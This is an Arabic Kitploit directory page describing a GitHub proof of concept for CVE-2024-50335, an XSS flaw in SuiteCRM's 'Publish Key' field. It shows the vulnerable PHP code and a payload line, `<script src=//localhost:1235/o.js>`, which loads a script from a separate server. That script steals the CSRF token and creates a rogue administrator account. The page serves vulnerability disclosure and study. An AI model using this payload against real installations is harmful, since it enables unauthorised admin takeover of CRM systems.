Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50335 — ثغرة أمنية في SuiteCRM يمكن استغلالها لسرقة رموز CSRF وتنفيذ إجراءات غير مصرح بها، مثل إنشاء مستخدمين إداريين جدد دون مصادقة مناسبة. | Kitploit
أدوات/GitHubGitHub/shellkraft/cve-2024-50335
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubshellkraft/cve-2024-50335

CVE-2024-50335

ثغرة أمنية في SuiteCRM يمكن استغلالها لسرقة رموز CSRF وتنفيذ إجراءات غير مصرح بها، مثل إنشاء مستخدمين إداريين جدد دون مصادقة مناسبة.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-50335: ثغرة XSS مصادق عليها في حقل "Publish Key" تسمح بإنشاء مستخدم مسؤول غير مصرح به

الملخص

حقل "Publish Key" في صفحة تعديل الملف الشخصي في SuiteCRM عرضة لثغرة XSS المنعكسة (Cross-Site Scripting)، مما يسمح للمهاجم بحقن كود JavaScript خبيث. يمكن استغلال ذلك لسرقة رموز CSRF وتنفيذ إجراءات غير مصرح بها، مثل إنشاء مستخدمين إداريين جدد دون مصادقة صحيحة.


التفاصيل

تنشأ الثغرة بسبب عدم كفاية التحقق من صحة المدخلات وتنظيفها في حقل Publish Key داخل تطبيق SuiteCRM. عندما يقوم المهاجم بحقن سكربت خبيث، يتم تنفيذه في سياق جلسة المستخدم المصادق عليه. ثم يستغل السكربت المحقون (o.js) رمز CSRF الملتقط لتزوير طلبات تنشئ مستخدمين إداريين جدد، مما يعرض سلامة وأمان مثيل CRM للخطر.


التأثير

تمثل هذه الثغرة مشكلة حرجة من نوع Cross-Site Scripting (XSS). ويشمل تأثيرها:

  1. وصول إداري غير مصرح به: يمكن للمهاجم إنشاء مستخدمين إداريين جدد، مما قد يمنحه سيطرة كاملة على مثيل CRM.
  2. سرقة رمز CSRF: تسمح بتنفيذ إجراءات غير مصرح بها نيابة عن المستخدمين المصادق عليهم.
  3. المساس بسلامة البيانات: القدرة على التلاعب بحسابات المستخدمين والإعدادات قد تؤدي إلى فقدان البيانات أو تسربها أو تعديلها دون إذن.

كود مصدر PHP القابل للاستغلال

$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);

$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";

$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";

$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);

إثبات المفهوم (PoC)

  1. سجّل الدخول إلى SuiteCRM باستخدام بيانات اعتماد مسؤول صالحة.
  2. انتقل إلى تعديل الملف الشخصي: قم بالوصول إلى صفحة تعديل الملف الشخصي لحساب المسؤول.
  3. في حقل "Publish Key" ضمن التبويب "Advanced"، احقن السكربت التالي:
<script src=//localhost:1235/o.js>
  1. تأكد من استضافة o.js على خادم على localhost بالمنفذ 1235، لتقديم كود الاستغلال كما هو موصوف في مقتطف كود JavaScript المقدم.
  2. احفظ التغييرات على ملف المسؤول الشخصي.
  3. عند إعادة تحميل صفحة SuiteCRM، يتم تنفيذ السكربت الخبيث o.js، الذي يسرق رمز CSRF ويستخدمه لإنشاء مستخدم إداري جديد بالبيانات التالية.
Username - imposter
Password - ok
  1. سجّل الدخول باستخدام بيانات اعتماد المستخدم الإداري الذي تم إنشاؤه حديثًا للتحقق من نجاح الاستغلال.

https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197


المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2024-50335
  • https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-8rw6-g96j-3w7m
تنزيل الأداة